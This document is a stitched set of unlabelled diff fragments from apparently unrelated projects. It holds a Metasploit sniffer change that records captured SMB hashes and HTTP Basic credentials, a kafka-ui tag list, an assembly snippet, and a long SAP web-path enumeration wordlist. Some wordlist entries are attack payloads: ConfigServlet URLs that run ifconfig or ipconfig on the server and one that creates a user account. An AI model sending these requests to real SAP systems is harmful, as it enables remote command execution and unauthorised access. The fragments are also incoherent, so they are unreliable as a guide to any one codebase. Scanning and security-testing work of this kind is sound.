-              report_auth_info(
-                :host  => dst_ip,
-                :port => 445,
-                :sname => 'smb',
+              report_cred(
+                :ip  => dst_ip,
+                :port => s[:port],
+                :service_name => 'smb',
                :user => s[:user],
-                :pass => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
-                :type => smb_db_type_hash,
+                :password => s[:domain] + ":" + s[:lmhash] + ":" + s[:ntlmhash] + ":" + s[:challenge],
+                :type => :nonreplayable_hash,
+                :jtr_format => smb_db_type_hash,
                :proof => "DOMAIN=#{s[:domain]} OS=#{s[:peer_os]}",
-                :active => true
+                :status => Metasploit::Model::Login::Status::SUCCESSFUL
              )

              report_note(
@@ -44,7 +44,16 @@ class SnifferURL < BaseProtocolParser
        end
        if s[:basic_auth]
          s[:user], s[:pass] = Rex::Text.decode_base64(s[:basic_auth]).split(':', 2)
-          report_auth_info s
+          report_cred(
+            :ip  => s[:host],
+            :port => s[:port],
+            :service_name => 'http',
+            :user => s[:user],
+            :password => s[:pass],
+            :type => :password,
+            :proof => "Session: #{s[:session]} Basic Auth: #{s[:basic_auth]}",
+            :status => Metasploit::Model::Login::Status::UNTRIED
+          )
          print_status "HTTP Basic Authentication: #{s[:session]} >> #{s[:user]} / #{s[:pass]}"
        end
      when nil
@@ -0,0 +1,188 @@
+[
+  {
+    "name": "v0.7.1",
+    "commit": {
+      "sha": "56fa824510d8a35b08e3b42bf6625c846e2ed5a0"
+    }
+  },
+  {
+    "name": "v0.7.0",
+    "commit": {
+      "sha": "fdd9ad94c11d44259ef26bf4b2dc9a8bd139f607"
+    }
+  },
+  {
+    "name": "v0.6.2",
+    "commit": {
+      "sha": "b0c367cac7211117e88a55517396764036ac0552"
+    }
+  },
+  {
+    "name": "v0.6.1",
+    "commit": {
+      "sha": "ef0dacb0c36a1a180ef8fda670c82854658aab00"
+    }
+  },
+  {
+    "name": "v0.6.0",
+    "commit": {
+      "sha": "e72f6d6d5dd078df2d270cc48a4087588443f89a"
+    }
+  },
+  {
+    "name": "v0.5.0",
+    "commit": {
+      "sha": "027d9b4653e2f3ea13d4de6a0b2bd568106ffb40"
+    }
+  },
+  {
+    "name": "v0.4.0",
+    "commit": {
+      "sha": "521ba0cb2f63110eb2ed13a7054a4d70238a862a"
+    }
+  },
+  {
+    "name": "v0.3.3",
+    "commit": {
+      "sha": "38c4cf7dd9275294348bab903be9dc12eafe37dd"
+    }
+  },
+  {
+    "name": "v0.3.2",
+    "commit": {
+      "sha": "9d9d31a6694ab1fc12da20ea18fa5a778ce5a631"
+    }
+  },
+  {
+    "name": "v0.3.1",
+    "commit": {
+      "sha": "e75c251013845f1921ea75c24b44fd7164ee398d"
+    }
+  },
+  {
+    "name": "v0.3.0",
+    "commit": {
+      "sha": "9606d7ee5ab3b8056b4a69610ae79b7b473d779d"
+    }
+  },
+  {
+    "name": "v0.2.1",
+    "commit": {
+      "sha": "da29a200cd8ec46da709e0523787479ac6fb274b"
+    }
+  },
+  {
+    "name": "v0.2.0",
+    "commit": {
+      "sha": "2e345f6f6caeb3495f6454bfaa5a10bf50639411"
+    }
+  },
+  {
+    "name": "v0.1.0",
+    "commit": {
+      "sha": "1869a7f0a85ceaa707ea25866da98a3ac5a0667e"
+    }
+  },
+  {
+    "name": "v0.0.10",
+    "commit": {
+      "sha": "f08970c1d8910091a392d26b51db33b5c99a0f81"
+    }
+  },
+  {
+    "name": "v0.0.9",
+    "commit": {
+      "sha": "f98abfb79dc2c437f1b6cb5f534da560c85c5406"
+    }
+  },
+  {
+    "name": "v0.0.8",
+    "commit": {
+      "sha": "222cf2c65189c97877491c7bcc6fc14982ce65d7"
+    }
+  },
+  {
+    "name": "v0.0.7",
+    "commit": {
+      "sha": "2a743a5bf4b27a6cc9cb857bd178c2e724d98821"
+    }
+  },
+  {
+    "name": "v0.0.6",
+    "commit": {
+      "sha": "f6253b6bfaa249236ac1b4f0505f4b7af8f89116"
+    }
+  },
+  {
+    "name": "v0.0.5",
+    "commit": {
+      "sha": "abae56b3d0d2383d0351280213236cd988fd6d28"
+    }
+  },
+  {
+    "name": "v0.0.4",
+    "commit": {
+      "sha": "4190d76f2fefb65cb898f6c648e932b2c1a5fba3"
+    }
+  },
+  {
+    "name": "v0.0.3",
+    "commit": {
+      "sha": "8057dc123f23f6da9752d712edeb5e7e490b648c"
+    }
+  },
+  {
+    "name": "v0.0.2",
+    "commit": {
+      "sha": "f5bb336a75351379dad289b73a85f6ebf8ff5498"
+    }
+  },
+  {
+    "name": "v0.0.1",
+    "commit": {
+      "sha": "ed08f278f95dca46e58e24a13923939d268eedd3"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.7.1",
+    "commit": {
+      "sha": "c998e17e8322a867c02ef4cdf577aa33c2d3a81e"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.7.0",
+    "commit": {
+      "sha": "78cc4dd981a89b26006fea0984f1305bc663281f"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.6.2",
+    "commit": {
+      "sha": "838fb604d569dae18a1a7a85ef28ed2c125df986"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.6.1",
+    "commit": {
+      "sha": "4a1e987a1d2a958119ab5c936d4b1d82125e14d9"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.6.0",
+    "commit": {
+      "sha": "f2a2574ddc8bbe20776071569935922c3593d5e7"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.5.4",
+    "commit": {
+      "sha": "334ba3df99dfc84385faace167f6410c8ce0be91"
+    }
+  },
+  {
+    "name": "charts/kafka-ui-0.5.3",
+    "commit": {
+      "sha": "cbb166026d8c6360836def9bf9c208313023961c"
+    }
+  }
+]
@@ -88,6 +88,7 @@ strtab:
 db 0
 db 0
 strtabsz equ $ - strtab
+
+align 16
 global _start
 _start:
-
@@ -1,3 +1,7 @@
+/@download@
+/ADS-EJB
+/ADS-License
+/AE/index.jsp
 /AdapterFramework/version/version.jsp
 /AdminTools/
 /Adobe
@@ -5,64 +9,26 @@
 /AdobeDocumentServices/Config?wsdl
 /AdobeDocumentServices/Grmg
 /AdobeDocumentServicesSec/Config
-/ADS-EJB
-/ADS-License
-/AE/index.jsp
 /AnalyticalReporting/
 /AnalyticalReporting/AnalyticalReporting_merge_web.xml
 /AnalyticalReporting/download/win32/websetup.properties
-/apidocs/
-/apidocs/allclasses-frame.html
-/apidocs/com/sap/engine/connector/connection/IConnection.html
-/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
-/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
-/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
 /ApplicationAdminProvider
-/bcb/
-/bcb/bcbadmHome.jsp
-/bcb/bcbadmNavigation.jsp
-/bcb/bcbadmSettings.jsp
-/bcb/bcbadmStart.jsp
-/bcb/bcbadmSystemInfo.jsp
-/bcbtest/start.jsp
 /BI_UDC
 /BizcCommLayerAuthoring/Config1
 /BizcCommLayerAuthoring/Config1?wsdl
 /BizcCommLayerAuthoring/Config?wsdl
-/bwtest
-/caf
 /CAFDataService/Config
 /CAFDataService/Config?wsdl
-/ccsui
-/CmcApp/logon.faces
 /CMSRTS/Config1
 /CMSRTS/Config1?wsdl
 /CMSRTS/Config?wsdl
-/com~tc~lm~webadmin~httpprovider~web
+/CmcApp/logon.faces
 /CrystalReports/viewrpt.cwr
-/ctc
-/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
-/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
 /DataArchivingService
-/dispatcher
-/@download@
-/dswsbobje
-/dswsbobje/services/BICatalog?wsdl
-/dswsbobje/services/listServices
-/examples/
-/examples_frame.html
-/examples.html
-/exchangeProfile/
 /GRMGHeartBeat
 /GRMGWSTest/service
 /GRMGWSTest/service?wsdl
-/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
-/htmlb/
-/htmlb/docs/api/index.html
-/htmlb/index.html
-/htmlb/jsp/index.jsp
-/htmlb/moresamples.html
-/htmlb/samples.html
+/IGSCustomizingXML
 /IciActionItemService/IciActionItemConf
 /IciActionItemService/IciActionItemConf?wsdl
 /IciChatLineService/IciChatLineConf
@@ -86,11 +52,67 @@
 /IciSystemService/IciSystemConf?wsdl
 /IciUserService/IciUserConf
 /IciUserService/IciUserConf?wsdl
-/IGSCustomizingXML
-/index.html
 /InfoViewApp/
 /InfoViewApp/help/en/user/html/
 /InfoViewApp/listing/main.do?appKind=InfoView&service=%2FInfoViewApp%2Fcommon%2FappService.do
+/KW
+/Lighthammer
+/Modeler
+/OpenSQLMonitors/
+/PerformacetraceTraceApplication
+/RE/index.jsp
+/SAPIKS
+/SAPIKS2
+/SAPIKS2/contentShow.sap
+/SAPIKS2/jsp/adminShow.jsp
+/SAPIrExtHelp
+/SLDStart/plain
+/SLDStart/secure
+/SQLtrace/index.html
+/TOdbo
+/TSapq
+/TXmla
+/TestJDBC_Web
+/VC
+/WSConnector/Config1
+/WSConnector/Config1?wsdl
+/WSConnector/Config?wsdl
+/apidocs/
+/apidocs/allclasses-frame.html
+/apidocs/com/sap/engine/connector/connection/IConnection.html
+/apidocs/com/sap/engine/deploy/manager/Deploymanager.html
+/apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
+/apidocs/com/sap/engine/deploy/manager/LoginInfo.html
+/bcb/
+/bcb/bcbadmHome.jsp
+/bcb/bcbadmNavigation.jsp
+/bcb/bcbadmSettings.jsp
+/bcb/bcbadmStart.jsp
+/bcb/bcbadmSystemInfo.jsp
+/bcbtest/start.jsp
+/bwtest
+/caf
+/ccsui
+/com~tc~lm~webadmin~httpprovider~web
+/ctc
+/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ifconfig
+/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
+/dispatcher
+/dswsbobje
+/dswsbobje/services/BICatalog?wsdl
+/dswsbobje/services/listServices
+/examples.html
+/examples/
+/examples_frame.html
+/exchangeProfile/
+/guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
+/htmlb/
+/htmlb/docs/api/index.html
+/htmlb/index.html
+/htmlb/jsp/index.jsp
+/htmlb/moresamples.html
+/htmlb/samples.html
+/index.html
 /inspection.wsil
 /ipcpricing/ui/
 /irj
@@ -111,32 +133,26 @@
 /irj/servlet/prt/portal/prtroot/com.sap.portal.epcf.loader.wdscriptblockprovider
 /irj/servlet/prt/portal/prtroot/pcd!(*)
 /irj/servlet/prt/portal/prttarget/uidpwlogon/prteventname/performchangepassword
-/KW
-/Lighthammer
 /logon
 /logon/index.jsp
 /logon/logonServlet
-/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
 /logon/logonServlet?redirectURL=%2FVC%2Fdefault.jsp
-/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
+/logon/logonServlet?redirectURL=%2Fuseradmin%2FuserAdminServlet
 /logon/logonServlet?redirectURL=%FVC%Fdefault.jsp
+/logon/logonServlet?redirectURL=%Fuseradmin%FuserAdminServlet
 /main.html
 /meSync/HttpGRMGTest.html
 /mmr/
 /mmr/mmr/MMRUI.html
-/Modeler
 /modeller/
 /modeller/index.html
 /monitoring
 /monitoring/SystemInfo
 /nwa
-/OpenSQLMonitors/
-/PerformacetraceTraceApplication
 /performanceProvierRoot
 /pmi
 /portal
 /portalapps
-/RE/index.jsp
 /rep/build_info.html
 /rep/build_info.jsp
 /rep/start/index.jsp
@@ -147,9 +163,24 @@
 /samlssodemo_dest
 /samlssodemo_source
 /sap/
+/sap/BSSP_SP_MAPS
+/sap/IStest
 /sap/admin
 /sap/admin/public/index.html
 /sap/ap
+/sap/bc/FormToRfc
+/sap/bc/FormToRfc/soap
+/sap/bc/IDoc_XML
+/sap/bc/MIDSD
+/sap/bc/MJC
+/sap/bc/MJC/
+/sap/bc/MJC/mi_host
+/sap/bc/MJC/mi_mds
+/sap/bc/MJC/mi_service
+/sap/bc/MJC/mi_services
+/sap/bc/MY_NEW_SERV99
+/sap/bc/Mi_host_http
+/sap/bc/Mime
 /sap/bc/abap/demo
 /sap/bc/abap/demo_apc
 /sap/bc/abap/demo_apc_pcp
@@ -184,34 +215,34 @@
 /sap/bc/bsp/sap/certmap
 /sap/bc/bsp/sap/certreq
 /sap/bc/bsp/sap/crm_bsp_frame
+/sap/bc/bsp/sap/crm_ic_ise/editor
+/sap/bc/bsp/sap/crm_thtmlb_util
+/sap/bc/bsp/sap/crm_ui_frame
+/sap/bc/bsp/sap/crm_ui_start
 /sap/bc/bsp/sap/crmcmp_bpident/
 /sap/bc/bsp/sap/crmcmp_brfcase
 /sap/bc/bsp/sap/crmcmp_hdr
 /sap/bc/bsp/sap/crmcmp_hdr_std
 /sap/bc/bsp/sap/crmcmp_ic_frame
-/sap/bc/bsp/sap/crm_ic_ise/editor
-/sap/bc/bsp/sap/crm_thtmlb_util
-/sap/bc/bsp/sap/crm_ui_frame
-/sap/bc/bsp/sap/crm_ui_start
-/sap/bc/bsp/sap/esh_sapgui_exe
 /sap/bc/bsp/sap/esh_sap_link
+/sap/bc/bsp/sap/esh_sapgui_exe
 /sap/bc/bsp/sap/graph_bsp_test
 /sap/bc/bsp/sap/graph_bsp_test/Mimes
 /sap/bc/bsp/sap/gsbirp
 /sap/bc/bsp/sap/hrrcf_wd_dovru
 /sap/bc/bsp/sap/htmlb_samples
+/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/iccmp_bp_cnfirm
 /sap/bc/bsp/sap/iccmp_hdr_cntnr
 /sap/bc/bsp/sap/iccmp_hdr_cntnt
 /sap/bc/bsp/sap/iccmp_header
 /sap/bc/bsp/sap/iccmp_ssc_ll/
-/sap/bc/bsp/sap/ic_frw_notify
 /sap/bc/bsp/sap/it00
 /sap/bc/bsp/sap/it00/default.htm
 /sap/bc/bsp/sap/it00/http_client.htm
 /sap/bc/bsp/sap/it00/http_client_xml.htm
-/sap/bc/bsp/sap/public/bc
 /sap/bc/bsp/sap/public/FAA
+/sap/bc/bsp/sap/public/bc
 /sap/bc/bsp/sap/public/graphics
 /sap/bc/bsp/sap/public/sem
 /sap/bc/bsp/sap/sam_demo
@@ -221,17 +252,17 @@
 /sap/bc/bsp/sap/sbspext_xhtmlb
 /sap/bc/bsp/sap/spi_admin
 /sap/bc/bsp/sap/spi_monitor
-/sap/bc/bsp/sapsrm
-/sap/bc/bsp/sapsrm/bsp_dhtml_apple
-/sap/bc/bsp/sapsrm/bsp_java_applet
-/sap/bc/bsp/sapsrm/call_sig_ctrl
-/sap/bc/bsp/sapsrm/ctlg_wrapper
 /sap/bc/bsp/sap/sxms_alertrules
 /sap/bc/bsp/sap/system
 /sap/bc/bsp/sap/thtmlb_scripts
 /sap/bc/bsp/sap/thtmlb_styles
 /sap/bc/bsp/sap/uicmp_ltx
 /sap/bc/bsp/sap/xmb_bsp_log
+/sap/bc/bsp/sapsrm
+/sap/bc/bsp/sapsrm/bsp_dhtml_apple
+/sap/bc/bsp/sapsrm/bsp_java_applet
+/sap/bc/bsp/sapsrm/call_sig_ctrl
+/sap/bc/bsp/sapsrm/ctlg_wrapper
 /sap/bc/contentserver
 /sap/bc/docu
 /sap/bc/echo
@@ -249,23 +280,10 @@
 /sap/bc/erecruiting/verification
 /sap/bc/error
 /sap/bc/error 
-/sap/bc/FormToRfc
-/sap/bc/FormToRfc/soap
 /sap/bc/graphics/net
 /sap/bc/gui/sap/its/CERTREQ
 /sap/bc/gui/sap/its/designs
 /sap/bc/gui/sap/its/webgui
-/sap/bc/IDoc_XML
-/sap/bc/MIDSD
-/sap/bc/Mi_host_http
-/sap/bc/Mime
-/sap/bc/MJC
-/sap/bc/MJC/
-/sap/bc/MJC/mi_host
-/sap/bc/MJC/mi_mds
-/sap/bc/MJC/mi_service
-/sap/bc/MJC/mi_services
-/sap/bc/MY_NEW_SERV99
 /sap/bc/ping
 /sap/bc/report
 /sap/bc/soap/ici
@@ -276,19 +294,23 @@
 /sap/bc/wdvd
 /sap/bc/wdvd/
 /sap/bc/webdynpro
+/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
+/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
+/sap/bc/webdynpro/sap/WDR_TEST_TABLE
+/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
 /sap/bc/webdynpro/sap/apb_launchpad
 /sap/bc/webdynpro/sap/apb_launchpad_nwbc
 /sap/bc/webdynpro/sap/apb_lpd_light_start
 /sap/bc/webdynpro/sap/apb_lpd_start_url
-/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/appl_log_trc_viewer
 /sap/bc/webdynpro/sap/appl_soap_management
+/sap/bc/webdynpro/sap/application_exit
 /sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
 /sap/bc/webdynpro/sap/cnp_light_test
 /sap/bc/webdynpro/sap/configure_application
 /sap/bc/webdynpro/sap/configure_component
-/sap/bc/webdynpro/sap/esh_admin_ui_component
 /sap/bc/webdynpro/sap/esh_adm_smoketest_ui
+/sap/bc/webdynpro/sap/esh_admin_ui_component
 /sap/bc/webdynpro/sap/esh_eng_modelling
 /sap/bc/webdynpro/sap/esh_search_results.ui
 /sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
@@ -314,25 +336,20 @@
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
 /sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
 /sap/bc/webdynpro/sap/hrrcf_a_tp_assess
-/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
+/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
 /sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
 /sap/bc/webdynpro/sap/sh_adm_smoketest_files
 /sap/bc/webdynpro/sap/wd_analyze_config_appl
 /sap/bc/webdynpro/sap/wd_analyze_config_comp
 /sap/bc/webdynpro/sap/wd_analyze_config_user
 /sap/bc/webdynpro/sap/wdhc_application
-/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
-/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
 /sap/bc/webdynpro/sap/wdr_test_popups_rt
-/sap/bc/webdynpro/sap/WDR_TEST_TABLE
 /sap/bc/webdynpro/sap/wdr_test_ui_elements
-/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
 /sap/bc/webrfc
 /sap/bc/workflow/shortcut
 /sap/bc/xrfc
 /sap/bc/xrfc_test
-/sap/BSSP_SP_MAPS
 /sap/crm
 /sap/es/atk
 /sap/es/cockpit
@@ -347,16 +364,39 @@
 /sap/gw
 /sap/gw/bep
 /sap/gw/jsonrpc
-/SAPIKS
-/SAPIKS2
-/SAPIKS2/contentShow.sap
-/SAPIKS2/jsp/adminShow.jsp
-/SAPIrExtHelp
-/sap/IStest
-/sapmc/sapmc.html
 /sap/monitoring/
 /sap/public
+/sap/public/BusinessSuite
+/sap/public/BusinessSuite/BCV
+/sap/public/BusinessSuite/BSSP
+/sap/public/BusinessSuite/CBESH_ICONS
+/sap/public/BusinessSuite/CloCo
+/sap/public/BusinessSuite/TM
+/sap/public/BusinessSuite/TM/FlashIslands
+/sap/public/BusinessSuite/TM/Icons
+/sap/public/BusinessSuite/TM/Icons_rtl
+/sap/public/E2EALERT
+/sap/public/ES
+/sap/public/HRPDV
+/sap/public/HRPDV/Icons
+/sap/public/HRRenewal
+/sap/public/HRRenewal/PB
+/sap/public/LSOFE
+/sap/public/LSOFE/IconLarge
+/sap/public/LSOFE/IconLarge/CORBU
+/sap/public/LSOFE/IconLarge/TRADESHOW
+/sap/public/LSOFE/Pictogram
+/sap/public/LSOFE/Pictogram/CORBU
+/sap/public/LSOFE/Pictogram/TRADESHOW
+/sap/public/PPM
+/sap/public/PPM/PFM
+/sap/public/PPM/PFM/BCV
+/sap/public/PPM/PFM/UI
+/sap/public/PPM/PRO
 /sap/public/bc
+/sap/public/bc/AR_NEWS_REDRCT
+/sap/public/bc/NWDEMO_MODEL
+/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/abap
 /sap/public/bc/abap/docu
 /sap/public/bc/abap/mime_demo
@@ -364,7 +404,6 @@
 /sap/public/bc/apc_test
 /sap/public/bc/apc_test/apc_tcp_test_sf
 /sap/public/bc/apc_test/apc_tcp_test_sl
-/sap/public/bc/AR_NEWS_REDRCT
 /sap/public/bc/bpo
 /sap/public/bc/bsp
 /sap/public/bc/clms
@@ -388,8 +427,6 @@
 /sap/public/bc/its/mobile/test
 /sap/public/bc/its/scripts
 /sap/public/bc/jsm
-/sap/public/bc/NWDEMO_MODEL
-/sap/public/bc/NW_ESH_TST_AUTO
 /sap/public/bc/pictograms
 /sap/public/bc/qgm
 /sap/public/bc/sec
@@ -410,13 +447,13 @@
 /sap/public/bc/ur
 /sap/public/bc/wdtracetool
 /sap/public/bc/webdynpro
-/sap/public/bc/webdynpro/adobechallenge
-/sap/public/bc/webdynpro/adobeChallenge
-/sap/public/bc/webdynpro/mimes
 /sap/public/bc/webdynpro/Polling
+/sap/public/bc/webdynpro/ViewDesigner
+/sap/public/bc/webdynpro/adobeChallenge
+/sap/public/bc/webdynpro/adobechallenge
+/sap/public/bc/webdynpro/mimes
 /sap/public/bc/webdynpro/ssr
 /sap/public/bc/webdynpro/viewdesigner
-/sap/public/bc/webdynpro/ViewDesigner
 /sap/public/bc/webicons
 /sap/public/bc/workflow
 /sap/public/bc/workflow/shortcut
@@ -424,31 +461,16 @@
 /sap/public/bsp/sap
 /sap/public/bsp/sap/htmlb
 /sap/public/bsp/sap/public
+/sap/public/bsp/sap/public/FAA
+/sap/public/bsp/sap/public/ISE
+/sap/public/bsp/sap/public/SEM
 /sap/public/bsp/sap/public/bc
 /sap/public/bsp/sap/public/faa
-/sap/public/bsp/sap/public/FAA
 /sap/public/bsp/sap/public/graphics
 /sap/public/bsp/sap/public/graphics/jnet_handler
 /sap/public/bsp/sap/public/graphics/mimes
-/sap/public/bsp/sap/public/ISE
-/sap/public/bsp/sap/public/SEM
 /sap/public/bsp/sap/system
 /sap/public/bsp/sap/system_public
-/sap/public/BusinessSuite
-/sap/public/BusinessSuite/BCV
-/sap/public/BusinessSuite/BSSP
-/sap/public/BusinessSuite/CBESH_ICONS
-/sap/public/BusinessSuite/CloCo
-/sap/public/BusinessSuite/TM
-/sap/public/BusinessSuite/TM/FlashIslands
-/sap/public/BusinessSuite/TM/Icons
-/sap/public/BusinessSuite/TM/Icons_rtl
-/sap/public/E2EALERT
-/sap/public/ES
-/sap/public/HRPDV
-/sap/public/HRPDV/Icons
-/sap/public/HRRenewal
-/sap/public/HRRenewal/PB
 /sap/public/icf_check
 /sap/public/icf_info
 /sap/public/icf_info/icr_groups
@@ -457,23 +479,14 @@
 /sap/public/icf_info/urlprefix
 /sap/public/icman
 /sap/public/icman/ping
+/sap/public/icmandir/its/kernel_version.info
+/sap/public/icmandir/last_update_ITS.txt
+/sap/public/icmandir/last_update_icmadmin.txt
 /sap/public/info
-/sap/public/LSOFE
-/sap/public/LSOFE/IconLarge
-/sap/public/LSOFE/IconLarge/CORBU
-/sap/public/LSOFE/IconLarge/TRADESHOW
-/sap/public/LSOFE/Pictogram
-/sap/public/LSOFE/Pictogram/CORBU
-/sap/public/LSOFE/Pictogram/TRADESHOW
 /sap/public/myssocntl
 /sap/public/opu
 /sap/public/opu/resources
 /sap/public/ping
-/sap/public/PPM
-/sap/public/PPM/PFM
-/sap/public/PPM/PFM/BCV
-/sap/public/PPM/PFM/UI
-/sap/public/PPM/PRO
 /sap/wdisp/admin
 /sap/wdvd
 /sap/webcuif
@@ -485,26 +498,20 @@
 /sap/webdynpro/sap/hrtmc_ta_assessment
 /sap/webdynpro/sap/hrtmc_ta_dashboard
 /sap/webdynpro/sap/wd_analyze_config_user
+/sapmc/sapmc.html
 /scripts/wgate
 /servlet/com.sap.admin.Critical.Actio
 /sim/
 /sim/config/testdata.jsp
 /sim/config/testerror.jsp
 /sim/index.html
-/SLDStart/plain
-/SLDStart/secure
 /socoview
 /socoview/flddisplay.asp
-/SQLtrace/index.html
 /sysconfig
-/tc/lm/webadmin/clusteradmin
 /tc.lm.webadmin.endtoend.public.app
+/tc/lm/webadmin/clusteradmin
 /teched/test
-/TestJDBC_Web
-/TOdbo
 /top.html
-/TSapq
-/TXmla
 /uddi/
 /uddiclient
 /uddiclient/jsps/index.jsp
@@ -512,7 +519,6 @@
 /useradmin
 /userhome
 /utl/UsageTypesInfo
-/VC
 /vscantest/
 /webdynpro/dispatcher
 /webdynpro/dispatcher/
@@ -530,14 +536,11 @@
 /webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
 /webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
 /webdynpro/dispatcher/sap.com/tc~wd~tools
-/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
 /webdynpro/dispatcher/sap.com/tc~wd~tools/WebDynproConsole
+/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer
 /webdynpro/dispatcher/virsa/ccappcomp/ComplianceCalibrator
 /webdynpro/resources/sap.com/
 /webdynpro/welcome/Welcome.jsp
-/WSConnector/Config1
-/WSConnector/Config1?wsdl
-/WSConnector/Config?wsdl
 /wsd2wsdl
 /wsnavigator
 /wsnavigator/jsps/index.jsp
@@ -547,3 +550,1084 @@
 /wssproc/cert
 /wssproc/plain
 /wssproc/ssl
+@download@
+ADS-EJB
+ADS-License
+AE/index.jsp
+Adobe
+AdobeDocumentServices/Config
+AdobeDocumentServices/Config?wsdl
+AdobeDocumentServices/Grmg
+AdobeDocumentServicesSec/Config
+ApplicationAdminProvider
+BI_UDC
+BizcCommLayerAuthoring/Config1
+BizcCommLayerAuthoring/Config1?wsdl
+BizcCommLayerUtilities/Config1
+CAFDataService/Config
+CAFDataService/Config?wsdl
+CMSRTS/Config1
+CMSRTS/Config1?wsdl
+DataArchivingService
+GRMGHeartBeat
+GRMGWSTest/service
+GRMGWSTest/service?wsdl
+IGSCustomizingXML
+IciActionItemService/IciActionItemConf
+IciActionItemService/IciActionItemConf?wsdl
+IciChatLineService/IciChatLineConf
+IciChatLineService/IciChatLineConf?wsdl
+IciChatSessionService/IciChatSessionConf
+IciContainerService/IciContainerConf
+IciEventService/
+IciEventService/IciEventConf
+IciEventService/IciEventConf?wsdl
+IciEventService/sap
+IciFolderService/IciFolderConf
+IciFolderService/IciFolderConf?wsdl
+IciItemService/IciItemConf
+IciItemService/IciItemConf?wsdl
+IciMessageService/IciMessageConf
+IciMessageService/IciMessageConf?wsdl
+IciMonitorService/IciMonitorConf
+IciMonitorService/IciMonitorConf?wsdl
+IciPhoneCallService/IciPhoneCallConf
+IciPhoneCallService/IciPhoneCallConf?wsdl
+IciPhoneLineService/IciPhoneLineConf
+IciSystemService/IciSystemConf
+IciSystemService/IciSystemConf?wsdl
+IciUserService/IciUserConf
+IciUserService/IciUserConf?wsdl
+KW
+Lighthammer
+Modeler
+OpenSQLMonitors
+OpenSQLMonitors/
+OpenSQLMonitors/index.html
+PerformacetraceTraceApplication
+RE/index.jsp
+SAPIKS
+SAPIKS2
+SAPIKS2/contentShow.sap
+SAPIKS2/jsp/adminShow.jsp
+SAPIrExtHelp
+SLDStart/plain
+SLDStart/secure
+SQLTrace
+SQLtrace/index.html
+TOdbo
+TSapq
+TXmla
+TestJDBC_Web
+VC
+WSConnector/Config1
+WSConnector/Config1?wsdl
+WSConnector/Config2
+_default
+apidocs/
+apidocs/allclasses-frame.html
+apidocs/com/sap/engine/connector/connection/IConnection.html
+apidocs/com/sap/engine/deploy/manager/Deploymanager.html
+apidocs/com/sap/engine/deploy/manager/DeploymanagerFactory.html
+apidocs/com/sap/engine/deploy/manager/LoginInfo.html
+bcb
+bcb/
+bcb/bcbadmHome.jsp
+bcb/bcbadmNavigation.jsp
+bcb/bcbadmSettings.jsp
+bcb/bcbadmStart.jsp
+bcb/bcbadmSystemInfo.jsp
+bcbtest
+bcbtest/start.jsp
+bwtest
+caf
+ccsui
+com~tc~lm~webadmin~httpprovider~web
+ctc
+ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=blabla,PASSWORD=blabla
+ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ipconfig%20/all
+dispatcher
+dswsbobje
+dtr_lite
+ecatt
+entrypoints/recent
+examples
+examples.html
+examples/
+examples_frame.html
+exchangeProfile
+exchangeProfile/
+guid/e067540a-a84c-2d10-77bf-c941bb5a9c7a
+htmlb
+htmlb/
+htmlb/index.html
+index.html
+inspection.wsil
+ipcpricing/ui/
+irj
+irj/go/km/basicsearch
+irj/go/km/details
+irj/go/km/docs
+irj/go/km/docs/etc/public/mimes/images
+irj/go/km/docs/etc/xmlforms
+irj/go/km/docs/ume/users
+irj/go/km/highlightedcontent
+irj/go/km/navigation
+irj/go/km/navigation/
+irj/go/km/navigation/ume/users
+irj/portal
+irj/portalapps
+irj/portalapps/com.petsmart.portal.navigation.masthead.idle_logout
+irj/portalapps/com.sap.portal.design.portaldesigndata
+irj/portalapps/com.sap.portal.design.urdesigndata
+irj/portalapps/com.sap.portal.epcf.loader
+irj/portalapps/com.sap.portal.navigation.detailedtree
+irj/sdn/soa-discovery
